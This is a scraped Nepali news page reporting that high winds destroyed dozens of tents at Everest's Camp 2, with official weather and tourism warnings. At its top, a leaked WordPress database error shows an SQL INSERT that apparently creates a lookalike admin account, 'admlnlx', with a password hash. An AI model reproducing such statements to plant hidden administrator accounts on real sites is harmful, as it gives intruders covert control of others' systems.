WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT77GA40nKiPoxW9jIKWVbpOLT6bpA/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 20:36:51', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २० बैशाख, काठमाडौँ । तीव्र गतिकाे हुरीबतासले सगरमाथा आरोहणका लागि दोस्रो क्याममा रहेको ३० भन्दा बढी टेन्ट उडाएको छ ।
‘शुक्रबार तीब्रगतिमा चलेको हावाहुरीले दोस्रो क्याम्पमा राखिएका ३०-३५ वटा टेन्ट नष्ट गरीदिएको आरोही चन्द्रश्वर राइले बताए । ‘७ हजार मिटरभन्दा माथि अत्याधिक कालो बादल छाएको, त्यहा हावाको ८०-९० किलोमिटर प्रतिघन्टाको गतिमा चलेको पनि बताए ।
हिमालयन गाइड्सले यसपटक सगरमाथा आरोहीकालागि दोस्रो क्याम्पदेखि चुचुरोसम्म डोरी टाँगेर रुट बनाइरहेको र बिहीबार मात्रै ८ हजार मिटर उचाईमा पर्ने साउथकोलसम्म डोरी टाँगेर बाटो बनाइसकेका पनि राईले बताए । ।
शुक्रबारदेखि शक्तिशाली चक्रवात ‘फानी’को प्रभावका कारण पूर्वी नेपालमा हावाहुरी, मेघगर्जनको हुन सक्ने भन्दै जल तथा पूर्वानुमान माहाशाखाले पनि सचेत गराएको छ ।
पर्यटन विभागले पनि शुक्रबार सूचना जारी गरी पर्यटक र तीनका एजेन्सीहरुलाई सचेत गराएको छ। ‘स्थानीय मौसमको ख्यालगरी आफू र आफ्ना पर्यटकलाई सुरक्षित स्थानमा राख्नु’, विभागका निर्देशक मीरा आचार्यले जारी गरेको सूचनामा भनिएको छ, ‘कुनै पनि क्षति हुन नदिने प्रवन्ध गर्नु गराउनू ।’
सगरमाथा सहित ३० वटा हिमाल अरोहणका लागि १ सय ४ आरोहण दलमा ८ सय ४१ जना गएका छन् । यीमध्ये सबैभन्दा धेरै सगरमाथा आरोहणकालागि ३ सय ७७ जना गएका छन् । सगरमाथा आधार शिविरमा मात्रै कम्तीमा १ हजार बढी शेर्पा, गाइड, सम्पर्क अधिकृत लगायत पुगेका राइले बताए ।